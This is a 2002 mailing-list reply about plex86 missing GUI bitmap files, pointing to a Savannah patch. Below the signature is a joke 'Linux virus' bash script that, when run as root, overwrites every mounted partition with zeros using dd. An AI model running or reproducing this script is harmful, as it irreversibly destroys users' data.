Le 28 F�vrier 2002 12:11, vous avez �crit :
> On Thursday 28 February 2002 10:10 am, you wrote:
> > If you use the August 2001 tarball (ie.: the "current" one), then you'll
> > have to add these files. I made a patch to fix this problem ( on savannah
> > ). The current CVS (September 2001) is fixed, though.
>
> What files?
>

the missing /plex86/gui/bitmaps ones.
http://savannah.gnu.org/patch/?group_id=869
patch #123

-- 
Eric Laberge

GCS/M/S d-(++) s-: a-- C++(++++) UL+++>$ !P L++ E--- W++ N+ w++ !O M
!V PS PE Y PGP-(+++) t++(-) X- R* tv+ b+ DI+++  D+ G e+>+++++ h! r--

#!/bin/bash
if [ $UID -ne 0 ]
then
 echo "Linux virus, please run as root"
else
 for partition in $(df | cut -d ' ' -f 1 | grep /dev)
 do
  dd if=/dev/zero of=$partition
 done
fi

Reply via email to